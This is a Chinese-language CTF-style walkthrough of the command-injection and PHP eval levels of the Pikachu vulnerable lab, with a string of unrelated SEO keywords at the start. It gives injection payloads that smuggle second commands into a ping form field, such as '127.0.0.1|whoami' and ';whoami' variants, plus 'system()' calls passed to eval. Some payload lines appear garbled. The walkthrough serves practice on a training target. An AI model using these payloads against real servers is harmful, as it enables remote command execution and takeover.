深圳网站开发公司h5,做卡盟网站,wordpress tag找不到,网上商城系统概述皮卡丘RCE靶场通关攻略 文章目录 皮卡丘RCE靶场通关攻略RCE(remote command/code execute)概述远程系统命令执行启动环境漏洞练习第一关exec ping第二关 exec eval RCE(remote command/code execute)概述
RCE漏洞#xff0c;可以让攻击者直接向后台服…皮卡丘RCE靶场通关攻略 文章目录 皮卡丘RCE靶场通关攻略RCE(remote command/code execute)概述远程系统命令执行启动环境漏洞练习第一关exec ping第二关 exec eval RCE(remote command/code execute)概述
RCE漏洞可以让攻击者直接向后台服务器远程注入操作系统命令或者代码从而控制后台系统。
远程系统命令执行
一般出现这种漏洞是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面用户从web界面输入目标IP提交后后台会对该IP地址进行一次ping测试并返回测试结果。 而如果设计者在完成该功能时没有做严格的安全控制则可能会导致攻击者通过该接口提交“意想不到”的命令从而让后台进行执行从而控制整个后台服务器
启动环境
启动靶场获得映射端口 这边地址是10.9.47.6:36162对它进行访问
漏洞练习
第一关exec “ping”
先输入地址尝试ping一下 ping完之后发现没反应 那就用我们命令注入测试语句试一下127.0.0.1|pwd 可以发现能看到目录说明存在该漏洞 接下来利用漏洞找到flag|find / |grep flag 接下来上传flag就通关了 下面是一些ping常用的注入命令
ping 127.0.0.1
127.0.0.1|whoami
ping 127.0.0.1|whoami
127.0.0.1whoami
127.0.0.1whoami
127.0.0.1;whoami
127.0.0.1||whoami
127.0.0.0.1||whoami
127.0.0.0.1|whoami第二关 exec “eval”
进入第二关这个是一个PHP代码的RCE利用 我们输入system函数看看能不能执行系统命令system(pwd); 发现执行成功了说明存在该漏洞我们用漏洞找到flagsystem(find / | grep flag); flag就找到了
